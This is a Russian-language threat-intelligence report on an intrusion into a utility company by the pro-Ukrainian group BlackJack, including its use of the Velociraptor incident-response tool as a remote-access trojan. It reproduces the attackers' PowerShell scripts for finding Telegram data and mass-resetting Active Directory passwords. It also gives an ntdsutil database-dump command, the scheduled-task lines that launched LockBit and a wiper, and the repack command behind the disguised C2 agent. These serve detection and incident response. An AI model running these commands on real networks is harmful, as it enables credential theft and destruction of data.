Оглавление

В конце 2023 года эксперты Solar 4RAYS проводили расследование в компании из сектора ресурсоснабжения. В ходе работ мы обнаружили артефакты, указывающие, что за атакой стоит проукраинская группировка, которая называет себя BlackJack (Gambling Zealot в таксономии Solar). В результате действий злоумышленников была уничтожена часть информационной инфраструктуры жертвы.

Из интересного: на одной из атакованных систем мы обнаружили Velociraptor - легитимный инструмент, разработанный специально для Incident Response. Его атакующие использовали в качестве RAT.

incident response

Ранее на практике мы с таким не сталкивались, как и не встречали подобных упоминаний в публичном пространстве. Подробнее о расследовании расскажем далее в статье. А под спойлером вы найдете обзор деятельности группировки Gambling Zealot.

Кто такие Gambling Zealot и как они связаны с другими группами

Gambling Zealot впервые заявили о себе в октябре 2023 года, когда завели собственный Telegram-канал. Судя по информации в открытом доступе, в качестве целей своих атак они выбирают российские объекты критической инфраструктуры, телеком-компании и предприятия оборонного сектора. Проникнув в целевую организацию, обычно в течение нескольких месяцев они ведут подробную разведку, получают доступы к критическим узлам (таким как серверы виртуализации, резервные копии, хранилища данных), а потом уничтожают эти компоненты, превращая ИТ-инфраструктуру в руины.

Мы видим различные артефакты, указывающие на связь Gambling Zealot с другими группировками и, поскольку они нередко заимствуют друг у друга инструменты и подходы к атакам, мы хотели бы сделать небольшой обзор этих связей.

Коллеги из BI.ZONE в статье с говорящим названием “Gambling Hyena и Twelfth Hyena: у двух хищников один хозяин?” с низкой степенью уверенности говорят о пересечениях BlackJack с другой хактивистской группировкой, известной, как Twelve.

Коллеги из “Лаборатории Касперского” в выступлении на Positive Hack Days Fest 2 также указали на пересечения TTP группировки с Twelve. Они говорили о схожести инструментария:

  • сэмплы шифровальщика LockBit 3, используемые этими группировками в разных атаках имели высокое совпадение по неточным хэшам;
  • вайпер был запакован в архивы со схожим неймингом;
  • для размещения ВПО в некоторых случаях использовались идентичные директории.

Чуть ниже в посте мы упомянем об использовании кастомного powershell-сценария для сбора данных мессенджера Telegram, который, по информации из выступления «Такой желанный Telegram», представленном на конференции "SOC Tech. Технологии SOC 2023", также использовала группировка Shadow/ C0met.

Коллеги из “Лаборатории Касперского” всё в том же выступлении заявляли об использовании группировкой BlackJack руткита FaceFish, который, по нашим данным, есть в арсенале группировки Shedding Zmiy. Мы также отмечали пересечения по техникам и инструментам, используемым Shedding Zmiy и другими группировками (в том числе Shadow/C0met/DARKSTAR и Twelve).

визуализация связей известных группировок между собой
Визуализация связей известных группировок между собой на основе анализа инструментария и техник, использованных в кибератаках

В “Лаборатории Касперского” предполагают, что группировка Twelve  назвала себя так, потому что всего злоумышленников было двенадцать. Мы хотели бы продолжить тему предположений. BlackJack – карточная игра в казино, которую в России чаще всего называют “Двадцать одно”. А 21 – это перевернутое число 12. Поэтому связь BlackJack с Twelve прослеживается даже в названиях.

По заявлениям некоторых Украинских СМИ, группировка BlackJack может быть связана со спецслужбами Украины, другие же напрямую заявляют о проведении группировкой атак совместно с кибердепартаментом СБУ Украины.

В сухом остатке: Gambling Zealot (BlackJack) - одна из кластера проукраинских группировок, чья деятельность направлена преимущественно на деструктивные атаки на российские организации. В нашей практике мы столкнулись с ними пока что однажды, и вот как это было.

Технические детали расследования

Наше расследование началось с публикации в Telegram-канале, принадлежащем группировке, где они рапортовали об успешно проведённой атаке. После чего, жертва обратилась к нам за помощью в расследовании инцидента.

К сожалению, установить точный вектор проникновения не удалось, так как группировка достаточно долго пребывала в инфраструктуре, прежде чем совершить “акт возмездия”, а часть ключевых систем была уничтожена злоумышленниками. Но зато удалось установить много другого.

Первые следы их активности на одной из систем датировались серединой августа 2023 года в виде программы для туннелирования трафика ngrok, размещенной по пути c:\windows\system32\vmtool.exe. Она была закреплена через планировщика задач. Это означало, что к моменту обнаружения атакующие уже находились на стадии Command & Control. Анализ артефактов со скомпрометированной системы позволил установить, что злоумышленники подключились к хосту по RDP с одной из «уничтоженных» систем и загрузили ngrok c официального сайта.  Далее с использованием psexec с другого скомпрометированного хоста был загружен конфиг ngrok.yml. Последующие подключения к системе атакующие выполняли по RDP, туннелируя трафик через ngrok.

Хотя о ngrok в последнее время упоминают довольно часто, мы всё равно ещё раз напомним о характерном следе его использования в виде значения ::%16777216 в поле «Адрес сети источника» событий с event ID 21 и 25 журнала ОС Windows TerminalServices-LocalSessionManager:

windows terminalservices-localsessionmanager

При дальнейшем расследовании инцидента мы установили другие инструменты и техники, которые группировка использовала в этой операции.

Для сбора данных популярного мессенджера Telegram использовался кастомный powershell-сценарий C:\Windows\System32\tops\tg_grab__scanner.ps1:

    
$hostnames = Get-Content $HostsFile
$null = New-Item -Path $OutputFile -ItemType File -Force
        
foreach ($hostname in $hostnames) {
    $users = Get-ChildItem "\\$hostname\C$\Users" -ErrorAction SilentlyContinue | Where-Object {$_.PSIsContainer}
        
    foreach ($user in $users) {
        $userPath = "\\$hostname\C$\Users\$($user.Name)"
        $tdataPath = "$userPath\AppData\Roaming\Telegram Desktop\tdata"
        $hasTdata = Test-Path $tdataPath
        
        if ($hasTdata) {
            $result = "hostname $hostname, user: $($user.Name) has Telegram $tdataPath"
            Write-Output $result
            Add-Content -Path $OutputFile -Value $result
        }
    }
}
    

Командлайн запуска:

./tg_grab__scanner.ps1 c:\users\Windows\system32\top\1hosts.txt c:\users\Windows\system32\top\res.txt

Группировка использовала кастомный powershell-сценарий C:\Users\Public\ps.ps1, предназначенный для сброса паролей доменных учетных записей (комментарии оставлены разработчиком).

    
# Import the Active Directory module if not already imported
Import-Module ActiveDirectory

# Function to generate random password
function GeneratePassword {
    $length = 12
    $characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
    $password = -join ($characters.ToCharArray() | Get-Random -Count $length)
    return $password
}

# Output file for new usernames and passwords
$outputFile = "newuserpass.txt"

# Get all users from Active Directory
$users = Get-ADUser -Filter *

# Display the count of users
$userCount = $users.Count
Write-Host "Found $userCount users in Active Directory. Do you want to change passwords for all users? (Y/N): " -NoNewline
$confirmation = Read-Host

# Check confirmation and proceed to change passwords
if ($confirmation -eq "Y") {
    foreach ($user in $users) {
        $username = $user.SamAccountName
        $newPassword = GeneratePassword

        $securePassword = ConvertTo-SecureString $newPassword -AsPlainText -Force
        Set-AdAccountPassword -Identity $username -NewPassword $securePassword -Reset
        Write-Host "Password changed for user $username."

        # Write the username and new password to the output file
        "$username,$newPassword" | Out-File $outputFile -Append
    }
} else {
    Write-Host "Password change operation cancelled."
}
    

Хотя у нас не было самих файлов для анализа, по данным различных артефактов нам удалось установить, что атакующие запускали на одной из систем следующие файлы:

  • Secretsdump.exe – предположительно, модуль Impacket для дампа учётных данных;
  • Wmiexec.exe – предположительно, модуль Impacket для удалённого выполнения команд по протоколу WMI;
  • Mimikatz.exe – предположительно, инструмент для дампа учётных данных;
  • PsExec64.exe – предположительно, легитимная утилита из пакета Sysinternals для удаленного выполнения команд;
  • Wip.exe – вайпер данных;
  • python-3.12.0-amd64.exe – предположительно, установщик python-среды;
  • npcap-1.78.exe – установщик библиотеки npcap проекта Nmap;
  • BOOTICEx64.exe – инструмент, позволяющий восстанавливать, устанавливать или создавать резервные копии MBR и PBR дисков или образов дисков, с возможностью разбивать их на разделы, форматировать, редактировать секторы в шестнадцатеричном формате, стирать все данные на диске или логическом диске, заполняя их настраиваемыми символами.

В числе прочих файлов, с которыми группировка взаимодействовала во время атаки, мы обнаружили в артефактах ОС сведения об открытии файла C:/Users/[redacted]/Desktop/парсер_серверів.py, явно принадлежащего атакующим. По названию нетрудно предположить, из какой страны группировка, ну или, по крайней мере, некоторые её участники.

При дальнейшем расследовании мы обнаружили следующее:

  • Для разведки в домене Active Directory Gambling Zealot использовали популярный сценарий PowerView.ps1 проекта PowerSploit и не менее популярный ADRecon.

Для дампа учетных данных в том числе использовался инструмент XenArmor Software All-In-One Password Recovery.

  • На одной из систем мы обнаружили скрипт C:\Users\[redacted]\Desktop\delete_zero_colonks.py, выполняющий команду quser на системах из файла ip.txt и записывающий результаты в файл done.txt.
  • На контроллере домена атакующие получили дамп базы данных Active Directory используя легитимную системную утилиту ntdsutil:
    powershell.exe ntdsutil.exe 'ac i ntds' 'ifm' 'create full C:\Users\Public\Temp\log' q q

На некоторых системах злоумышленники устанавливали популярное ПО для удалённого доступа Anydesk, закрепляемое стандартным способом - через каталог автозагрузки C:\Users\All Users\Start Menu\Programs\Startup.

  • На машине системного администратора, учетная запись которого также была скомпрометирована в период инцидента, был установлен уязвимый к CVE-2023-3278 менеджер паролей KeePass версии 2.46, позволяющей получить мастер-пароль из дампов оперативной памяти (всей системы или самого процесса KeePass). Атакующие подключались к его компьютеру незадолго до проведения деструктивных операций и получили доступ к базе паролей C:\Users\[redacted]\Desktop\pass.kdbx.
  • Gambling Zealot разместили web-shell  на одном из серверов жертвы, на котором был развернут публично доступный Интернет-портал, подключившись к системе по RDP с одного из скомпрометированных компьютеров.
  • Горизонтальное перемещение по инфраструктуре жертвы в этом инциденте атакующие выполняли, преимущественно, по протоколу RDP.

Оставаясь незамеченной в инфраструктуре атакованной компании на протяжении нескольких месяцев, группировка хорошо изучила структуру корпоративной сети и активно изучала содержимое машин, к которым им удалось получить доступ. Среди прочего чувствительного контента,  атакующие получили доступ к файлам, содержащим данные об учетных записях в открытом виде, сдампили некоторые из них, включая привилегированные, и в конечном итоге, используя групповые политики на контроллере домена, запустили через задачи cp1, cp2, run1, run2, run3 на хостах шифровальщик LockBit 3 и вайпер данных.



Velociraptor

В этом кейсе атакующие не использовали каких-то уникальных техник и инструментов, но удивить нас им все же удалось. На хосте-плацдарме спустя как минимум четыре месяца после вторжения была создана системная служба MsiAFterburn с исполняемым файлом C:\Program Files\MSI\afterburner.exe. Вот только файл не имел ничего общего с популярным ПО для разгона видеокарт MSI Afterburner и оказался…барабанная дробь…агентом Velociraptor – известного инструмента, используемого при реагировании на инциденты! Gambling Zealot использовали инструмент, созданный, чтобы помогать “синим” командам защищать организации, в своих “красных” целях – для выполнения команд на хосте, сбора различной информации и файлов.

 Сервер Velociraptor, с которого осуществлялось управление агентом, был развернут по адресу: hxxps[:]//46.161.14[.]127:443. За несколько минут до установки службы, атакующие, используя одну из скомпрометированных учетных записей, загрузили файл с ресурса hxxp[:]//159.100.6[.]85:8181/this.exe, предположительно являющийся тем самым afterburner.exe. Отметим, что оба адреса имели идентичные SSL-сертификаты и открытый порт 443, который использовался в C2 Velociraptor.

Перейдем непосредственно к анализу файла C:\Program Files\MSI\afterburner.exe.

MD5

ffae73e582dce8ae4d510f77fcbeba70

SHA1

e983df289d8fbd100bd25730212cd0791c0b49b1

SHA256

3e92b6e59a858ef67860fd8cb122d7a0f1908e96828d0e051cc8b7097896a7a5

Module name

a.out.exe

File path

C:\Program Files\MSI\afterburner.exe

File size

56814904 bytes (54.2 MB)

Comp. timestamp

2023-09-10 16:27:52

Файл имел стандартную иконку Velociraptor

иконка velociraptor

И обладал невалидной цифровой подписью:

Verified:       The digital signature of the object did not verify.
Signing date:   19:31 2023-09-10
Publisher:      Rapid7 LLC
Company:        Rapid 7 Inc
Description:    Velociraptor: Digging Deeper!
Product:        Velociraptor
Prod version:   n/a
File version:   n/a
MachineType:    64-bit

Позже выяснилось, что данный файл имеет встроенную конфигурацию (embedded config). Из-за наличия встроенной конфигурации цифровая подпись становится невалидной, так как изменяются данные в секции .data. Подробнее об этом расскажем далее.

Встроенная конфигурация

Встроенная конфигурация Velociraptor на примере Windows-файлов хранится в секции .data. Она всегда начинается со строки ###<Begin Embedded Config> и сжата с помощью zlib (это также видно по первым двум байтам – 78 9C zlib default compression):

Самый удобный и быстрый способ получения встроенной конфигурации – использование самого Velociraptor. Для этого необходимо выполнить команду:

velociraptor.exe config show

В stdout будет выведен конфиг в yaml-формате.

Для Velociraptor, использованного злоумышленниками, был получен следующий конфиг:

    
Client:
server_urls:
- hxxps://46.161.14[.]127:443/
ca_certificate: |
    -----BEGIN CERTIFICATE-----
    MIID...
    -----END CERTIFICATE-----
writeback_windows: $ProgramFiles\MSI\wbak.yaml
tempdir_windows: $ProgramFiles\MSI\bbin
windows_installer:
    service_name: MsiAFterburn
    install_path: $ProgramFiles\MSI\afterburner.exe
    service_description: MSI Afterburner
version:
    name: velociraptor
    version: 0.7.0-2
    commit: 82f2cada
    build_time: "2023-09-10T16:24:02Z"
use_self_signed_ssl: true
pinned_server_name: VelociraptorServer
local_buffer:
    filename_windows: $TEMP/ABuffer.bin      
    

В данном конфиге мы скрыли параметры, которые имеют значения по умолчанию или не представляют особый интерес. Полный конфиг доступен в Приложении 2. В представленном конфиге мы видим адрес Velociraptor-сервера злоумышленников – hxxps://46.161.14[.]127:443/, а также CA-сертификат, пути для его установки и хранения логов.

У Velociraptor есть возможность указывать конфиг через опцию -c | --config <path-to-config>. В тоже время можно создавать клиенты со встроенными конфигурациями. Например, в веб-интерфейсе Velociraptor на вкладке Server Artifacts через offline collector builder. Функция repack используется для создания кастомизированных offline-коллекторов артефактов. Также имеется функционал встраивания своих исполняемых файлов для сбора артефактов.

В данном случае злоумышленники упаковывали конфиг как раз с помощью команды repack, потому что какие-либо другие функции (сбор артефактов или другие), которые обычно есть у offline-коллекторов, отсутствовали:

velociraptor-v0.7.0-2-windows-amd64.exe config repack <client.config.yaml> this.exe

Для получения первоначального yaml-конфига могла быть использована команда:

<velociraptor-exe> config generate > <client.config.yaml>

Далее в yaml-файле оставили только конфиг клиента и изменили нужные параметры (сервер, пути установки и хранения логов), после чего файл был использован в команде repack. Здесь мы неспроста в качестве exe-файла указали <velociraptor-exe>, так как для создания конфига злоумышленники использовали один файл, а для упаковки – другой. Подробнее об этом в следующем разделе.

Особенности

Рассмотрим различные особенности Velociraptor. Одни будут полезны при расследовании инцидента, другие – расширят кругозор:

1) проверка Velociraptor на наличие встроенных бэкдоров;

В последнее время мы с коллегами из других ИБ-компаний часто наблюдаем забэкдоренные утилиты (ps, netstat, ss, htop, sshd). Поэтому полезно знать, как быстро понять, вносились ли какие-либо изменения в Velociraptor.

Наличие валидной цифровой подписи может означать, что на исследовании легитимный файл, загруженный из releases в Github. Именно там представлены подписанные версии. Рекомендуется найти соответствие по хешам.

Если цифровая подпись невалидна, то первым делом необходимо убедиться в наличии встроенного конфига. Если конфига не обнаружено, то это повод для начала более детального исследования причин невалидности цифровой подписи. Если конфиг обнаружен, то для подтверждения отсутствия закладок рекомендуем убрать этот конфиг, то есть “откатить” файл до состояния “без конфига”. Это можно сделать разными способами. Самый простой – открыть файл в hex-редакторе и заменить байты встроенного конфига оригинальными байтами. Оригинальные байты доступны в файлах config\default.yaml или config\offline.sh. В нашем кейсе после замены встроенного конфига на оригинальные байты мы получили хеш 227693785eb5d99dc8689c6914537b8c, который совпадает с оригинальным файлом velociraptor-v0.7.0-2-windows-amd64.exe из официального репозитория.

2) дата генерации конфига как альтернатива временной метке компиляции;

В нашем кейсе оригинальная дата компиляции Velociraptor оказалась бесполезной, так как отражала время, когда была собрана релизная версия файла в официальном репозитории. Мы обнаружили, что при генерации конфига Velociraptor генерирует сертификат и параметр Not Before устанавливается в значение time.Now(). Параметр Not Before в сертификате злоумышленников:

Validity
  Not Before:     21/11/2023 21:40:32 (dd-mm-yyyy hh:mm:ss) (231121214032Z)

Это укладывалось в таймлайн инцидента, и мы приняли дату в качестве даты генерации конфига.

3) дата запуска Velociraptor на хосте;

Дату запуска можно взять из параметра install_time writeback-файла wbak.yaml. В данный параметр записывается текущее время в формате unix timestamp. Также дату запуска можно определять по дате создания writeback-файла.

4) параметры в подразделе version yaml-конфига;

Полезно знать, что при вызове команды config show в подразделе version отображаются параметры, свойственные текущему файлу Velociraptor, в который встроен конфиг: version, commit, build_time и compiler. Если встроенный конфиг получить вручную (найти его в секции .data и распаковать), то в подразделе version мы увидим реальные параметры самого конфига, который встраивали. Сравнение конфигов представлено на рисунке ниже:

Сравнение конфигов Velociraptor (слева – полученный командой config show, справа – распакованный вручную из секции .data)
Сравнение конфигов Velociraptor (слева – полученный командой config show, справа – распакованный вручную из секции .data)

Исходя из значения ci_build_url, видно, что yaml-конфиг скорее всего генерировался exe-файлом Velociraptor, который был собран в результате выполнения ci-задачи.

Указанное в конфигурации значение commit 82f2cad – это коммит в ветке v0.7.0 от 10.09.2023 15:20 UTC+0.

Также обычно при использовании команды config generate в конфиг записывается параметр install_time, в котором как раз содержится дата его генерации, но, вероятно, злоумышленники просто удалили эту строку перед встраиванием конфига. Почему для генерации использовался файл из ci-задачи нам не до конца понятно, но у нас есть предположения, почему конфиг был встроен в файл velociraptor-v0.7.0-2-windows-amd64.exe из вкладки Releases – Windows-файлы в релизах подписаны цифровой подписью.

Параметры из подраздела version в конфиге можно изменять как угодно. Их реальные значения будут храниться во встроенном конфиге.

В общем, полезно знать, что при использовании config show большинство параметров из подраздела version будут относиться к файлу, в который встроен конфиг, а не к самому конфигу.



Выводы

Случай с использованием ПО для реагирования на инциденты Velociraptor в качестве RAT говорит об изобретательности группировки. Атакующие не только обращаются к хорошо известным легитимным утилитам типа psexec и Anydesk, но и поднимаются на ступень выше, применяя инструменты, призванные помогать защитникам. Поэтому, необходимо уделять пристальное внимание появлению в вашей инфраструктуре легитимного ПО, которое, как правило, не используется, либо случаям, когда знакомое легитимное ПО используется по новыми, незнакомым вам сценариям.

Также, мы всё чаще убеждаемся в том, что кибергруппировки связаны между собой. Они обмениваются или используют схожие инструменты, имеют общие подходы к проведению атак. Все это позволяет сделать выводы о командной работе группировок, а не об их разрозненном существовании.



IOCs

File hashes

MD5

989e758ebcc9d45ce396c4e420895a10
4e7247986ed7c5e6bfa7d1afa98e69ba
904421429167c5c6d5ce5930778e06bb
da30f54a3a14ad17957c88bf638d3436
75eecc3a8b215c465f541643e9c4f484
c8dd28f1135c11861eb7d93b7a931433
ed5815ddad8188c198e0e52114173cb6
775eebc008b0c1e2a2c3f19d1a25d83a
60b6cfe22c6af4a81f596de6e836b3b9
d4621b796afe1488af4cdb1e85687e1b
81010f439131a59d993353208974aa3d
7068bf4c16db1f311dbc232dff8deece
10c6bc2235208c07e9f1fab0edf05346
ffae73e582dce8ae4d510f77fcbeba70
e7d23d1123a5c5477f38c182ab2a8c27
42aac414fa3eee585f447a2678813be7
bd51895ec50ad13a5a74ac8f5c92021b
47bb2c3b9e387fe6723e9dc698f0d383
bdc4fd7329e5f5baa7964b24c61171fd

SHA1

f99a2c36589bd6ee3de59fca7048b87456a02d83
703330e5066ad435ea2ca29129cb83443dc42a94
3ad1f800b63640128bfdcc8dbee909554465ee11
a59038260c47467a8ba32fe1053ea64193c0fc20
4a0b8c5fac5820a410670c01f41912094d7a5134
5bb299ebc9f1624d5167b4a0f83419656291a19f
846f2c6b7f0ee865b91c9db85f7d86715b24a659
fecfb6bc57e6d990575e6ede5492c20b15ce837d
cc0b1bf483905f8d0200c70cb856ea1355983d06
d77c1a9776c642ee6ee21e8e548d678fb798a7fc
2fcb3522c003081e76159089fe704f3197f0817b
e983df289d8fbd100bd25730212cd0791c0b49b1
e38c504ab9e5bc0f4374dd74074fce2c131564f4
3188ec82a799dd81f4fa1d0e1f7ee69caa508aaf
deb6b9c6c060ff4ec1eecd2521ad5f0650ecb60f
39c6c48804e6c7dee189532810907851deedb8e4
f7ef82146661f8d80193eaf29a190ccc86c5be0c

SHA256

037ae251fca0f468b24df9f65e94715f991166be0a2004ee8bb0db3f11a314d9
62bd150e2a341e553ece6ba018f5ddb7311ce9decc4548a85356785f16f86c1b
c9d84d4866c7cfc48ab12f538ba43d353e15f3f38c6177f7033d5b78819a554c
5e7a13855610eda52d77ced12517ff8cdac02edb632f45ef279af12158f2a93a
ec33d8ee9c3881b8fcea18f9f862d5926d994553aec1b65081d925afd3e8b028
708ca37f627961e44b9e64515ac0d162c54d6b87a627ade0ef05ba419cc2d509
63a0a75c6b2e4bf8582578a1da1daeeb9d713dafbc2dbb690fefd84fd05994fa
c423e1f6b5c6b57e1d552f11673b1e95afabd08769cf9a6e0957468ceb70f85a
5ba301e2801acc7141ad01e2676e1e4f273201efed535d6d0a2c177979b5151c
5e127fc6a2d6b7db3aacab5de75be5f4a61e0f6790d0c0d25e9b11cadc66b3d2
6898f18dd4df84664ed983066751869d24528919411712013f7100b190a5171e
b595386d0b7390d4ce6e4957190415165b39b6c99fa6e2649a233190924a0f29
15cf3f091f1ab0a2ac1321141b900937caef5b05a7f00fe3d79a281d07c5091f
3e92b6e59a858ef67860fd8cb122d7a0f1908e96828d0e051cc8b7097896a7a5
dc415e19fdea115c80edff3851aca1ab589db68f11c5b37851a7fec819b61687
810fdd73c248d7db389b66ff6fd29ae0552283cddb5130590cd9284bf9253c10
507e8666c239397561c58609f7ea569c9c49ddbb900cd260e7e42b02d03cfd87
817e540926e56ec6c2fa36ac46ea13bca2088e68d84c67b9a0cc0837ae29bde7
2b7801369eb9a58b96024a3c0a3e4f7e5753863880d8d9de1f7144070ba5dc30

IPs

46.161.14[.]127
159.100.6[.]85
176.96.226[.]227
176.96.226[.]243
104.28.156[.]44



Приложение 1. Расширенная информация по файловым IOCs

Путь

MD5

SHA1

SHA256

Комментарий

C:\Windows\System32\OneDrive.exe

989e758ebcc9d45ce396c4e420895a10

0dcd97c1fd20ab3bcaca761968f2f35a259d3f15

037ae251fca0f468b24df9f65e94715f991166be0a2004ee8bb0db3f11a314d9

Модифицированный ngrok

C:\Windows\System32\vmtool.exe

4e7247986ed7c5e6bfa7d1afa98e69ba

1cd5baaac6fb14254971819145989a5b96038848

62bd150e2a341e553ece6ba018f5ddb7311ce9decc4548a85356785f16f86c1b

Модифицированный ngrok

C:\Windows\System32\config\systemprofile\AppData\Local\ngrok\ngrok.yml C:\Users\PrjExchange\AppData\Local\ngrok\ngrok.yml

904421429167c5c6d5ce5930778e06bb

f99a2c36589bd6ee3de59fca7048b87456a02d83

c9d84d4866c7cfc48ab12f538ba43d353e15f3f38c6177f7033d5b78819a554c

Файл с параметрами ngrok:

version: "2"

authtoken: 2QeJvvXwlA7oP7njLqC2PJWr1yL_mdkSPSGzqo9WixSTxyaw

C:\Users\Public\bj.exe

\\[redacted]\netlogon\bj.exe

da30f54a3a14ad17957c88bf638d3436

703330e5066ad435ea2ca29129cb83443dc42a94

5e7a13855610eda52d77ced12517ff8cdac02edb632f45ef279af12158f2a93a

Шифровальщик Lockbit 3

C:\ProgramData\AnyDesk.exe

C:\ProgramData\AnyDesk\AnyDesk.exe

75eecc3a8b215c465f541643e9c4f484

3ad1f800b63640128bfdcc8dbee909554465ee11

ec33d8ee9c3881b8fcea18f9f862d5926d994553aec1b65081d925afd3e8b028

AnyDesk Software

C:\Users\Public\BOOTICEx64.exe

c8dd28f1135c11861eb7d93b7a931433

a59038260c47467a8ba32fe1053ea64193c0fc20

708ca37f627961e44b9e64515ac0d162c54d6b87a627ade0ef05ba419cc2d509

ПО для манипуляций с  MBR (Master Boot Record)

C:\Users\Public\wiper.ex_

С:\ProgramData\wip.exe

ed5815ddad8188c198e0e52114173cb6

4a0b8c5fac5820a410670c01f41912094d7a5134

63a0a75c6b2e4bf8582578a1da1daeeb9d713dafbc2dbb690fefd84fd05994fa

Вайпер данных

C:\Users\Public\ps.ps1

775eebc008b0c1e2a2c3f19d1a25d83a

5bb299ebc9f1624d5167b4a0f83419656291a19f

c423e1f6b5c6b57e1d552f11673b1e95afabd08769cf9a6e0957468ceb70f85a

Скрипт для смены паролей в домене

C\Windows\System32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\OneDriveMachineCore{24532E23-34EC-5236-8E8A-EEB10C475EB6}

60b6cfe22c6af4a81f596de6e836b3b9

846f2c6b7f0ee865b91c9db85f7d86715b24a659

5ba301e2801acc7141ad01e2676e1e4f273201efed535d6d0a2c177979b5151c

Задача для закрепления Ngrok и работы в режиме туннелирования порта RDP 3389

C\Windows\System32\Tasks\VMwareToolMachineCore{24532E23-34EC-5236-8E8A-EEB10C475EB6}

d4621b796afe1488af4cdb1e85687e1b

fecfb6bc57e6d990575e6ede5492c20b15ce837d

5e127fc6a2d6b7db3aacab5de75be5f4a61e0f6790d0c0d25e9b11cadc66b3d2

Задача для закрепления Ngrok и работы в режиме туннелирования порта RDP 3389

C\Windows\System32\Tasks\run

81010f439131a59d993353208974aa3d

cc0b1bf483905f8d0200c70cb856ea1355983d06

6898f18dd4df84664ed983066751869d24528919411712013f7100b190a5171e

Задача планировщика. Выполняет запуск cmd.exe /c c:\programdata\bj.exe -pass eee98fb73b6f6a38d054f0009722db22

C\Windows\System32\Tasks\run2

7068bf4c16db1f311dbc232dff8deece

d77c1a9776c642ee6ee21e8e548d678fb798a7fc

b595386d0b7390d4ce6e4957190415165b39b6c99fa6e2649a233190924a0f29

Задача планировщика. Выполняет запуск cmd.exe /c \\[redacted]\netlogon\bj.exe -pass eee98fb73b6f6a38d054f0009722db22

C\Windows\System32\Tasks\run3

10c6bc2235208c07e9f1fab0edf05346

2fcb3522c003081e76159089fe704f3197f0817b

15cf3f091f1ab0a2ac1321141b900937caef5b05a7f00fe3d79a281d07c5091f

Выполняет запуск cmd.exe /c c:\programdata\wip.exe

C:\Program Files\MSI\afterburner.exe

ffae73e582dce8ae4d510f77fcbeba70

e983df289d8fbd100bd25730212cd0791c0b49b1

3e92b6e59a858ef67860fd8cb122d7a0f1908e96828d0e051cc8b7097896a7a5

Velociraptor v0.7.0-2 x64 со встроенным конфигом

C:\Windows\System32\tops\tg_grab__scanner.ps1

e7d23d1123a5c5477f38c182ab2a8c27

e38c504ab9e5bc0f4374dd74074fce2c131564f4

dc415e19fdea115c80edff3851aca1ab589db68f11c5b37851a7fec819b61687

Powershell – сценарий для сбора данных Telegram

C:\Users\psw_chg\Desktop\testing.php

42aac414fa3eee585f447a2678813be7

3188ec82a799dd81f4fa1d0e1f7ee69caa508aaf

810fdd73c248d7db389b66ff6fd29ae0552283cddb5130590cd9284bf9253c10

Веб-шелл wso 4.2.5

C:\Windows\System32\q\PowerView.ps1

bd51895ec50ad13a5a74ac8f5c92021b

deb6b9c6c060ff4ec1eecd2521ad5f0650ecb60f

507e8666c239397561c58609f7ea569c9c49ddbb900cd260e7e42b02d03cfd87

PowerView

C:\Users\[redacted]\Desktop\delete_zero_colonks.py

47bb2c3b9e387fe6723e9dc698f0d383

39c6c48804e6c7dee189532810907851deedb8e4

817e540926e56ec6c2fa36ac46ea13bca2088e68d84c67b9a0cc0837ae29bde7

Скрипт выполняет команду quser на системах из файла ip.txt и записывает результаты в файл done.txt

ad_ru.ps1

bdc4fd7329e5f5baa7964b24c61171fd

f7ef82146661f8d80193eaf29a190ccc86c5be0c

2b7801369eb9a58b96024a3c0a3e4f7e5753863880d8d9de1f7144070ba5dc30

ADrecon



Приложение 2. Конфигурационный файл Velociraptor

    
version:
name: velociraptor
version: 0.7.0-2
commit: 82f2cad
build_time: "2023-09-10T15:23:01Z"
ci_build_url: https://github.com/Velocidex/velociraptor/actions/runs/6137985901
compiler: go1.21.0
Client:
server_urls:
- hxxps://46.161.14[.]127:443/
ca_certificate: |
    -----BEGIN CERTIFICATE-----
    MIIDSzCCAjOgAwIBAgIQSZhO5omKvQEKKRZf8URXXjANBgkqhkiG9w0BAQsFADAa
    MRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwHhcNMjMxMTIxMjE0MDMyWhcNMzMx
    MTE4MjE0MDMyWjAaMRgwFgYDVQQKEw9WZWxvY2lyYXB0b3IgQ0EwggEiMA0GCSqG
    SIb3DQEBAQUAA4IBDwAwggEKAoIBAQCcJnRe+vEpvg8iEqSAwYQ6644t6TCTglp3
    p+8Ooo+jCODljmJAJwUwrhUMUTMXvfDa5KBFauav0/qikVJzHAZBYTsbwMUb1pgT
    zgNDKmzuu/JHmyHx3wEjfmLcRHugTdCItbf9qjA6OeQHmEmzFnCKT2NuSBF2Sr3B
    SMINkT+4wmnqwNjtwWCYFNSEHUumWw6A0e/qRczVagM29t3xAOaJO4UvbSRNcB1f
    yox45BeNl/g+ZnTydqh44xMD31m/O5IipzGgv/UzgXmkZs8Ybhh82QcT7AEwEypO
    5zt2UgYaFjgSopuaWoZHPSGq6c/zZAMWjbbk2ND55eaC9o0UljVZAgMBAAGjgYww
    gYkwDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcD
    AjAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQWBBQIYQbq8cY7Rl99dTcSXF4ZMgVL
    jzAoBgNVHREEITAfgh1WZWxvY2lyYXB0b3JfY2EudmVsb2NpZGV4LmNvbTANBgkq
    hkiG9w0BAQsFAAOCAQEAOuFliuQAWUmRGEyIiFr20VONT0IHce7V4sRJg2dVsk1M
    BwbqOVfVzQg7R8/iP3NC7wfTQYtJ3LNYWZN9ybbgfa8kkTZMV6cWhUMOndj58cyE
    iOwOO/0SGg1Cq8QLKNCygmFE2RqOSuIYcwCbdEbX5ZAqUMVfMLNQi/3dentwO+fp
    qX0VfPc7D/AtyQDh4n/SXmrMArQFcvGOYsPv3VcHNhe2QhX+afUVGRy4yo28aluC
    P5ygp0wDcJYzlsZgfIB4t3JunHC+aWml48VHTrqetX2kY0jtbUpL17/ylNhlE6s8
    Bsc9Z1Mtp0abfENKUZ9UtTRxE5L4oE7AtW3Usng4ag==
    -----END CERTIFICATE-----
nonce: 7oiB85/e0FY=
writeback_darwin: /etc/velociraptor.writeback.yaml
writeback_linux: /etc/velociraptor.writeback.yaml
writeback_windows: $ProgramFiles\MSI\wbak.yaml
tempdir_windows: $ProgramFiles\MSI\bbin
max_poll: 60
nanny_max_connection_delay: 600
windows_installer:
    service_name: MsiAFterburn
    install_path: $ProgramFiles\MSI\afterburner.exe
    service_description: MSI Afterburner
darwin_installer:
    service_name: com.velocidex.velociraptor
    install_path: /usr/local/sbin/velociraptor
version:
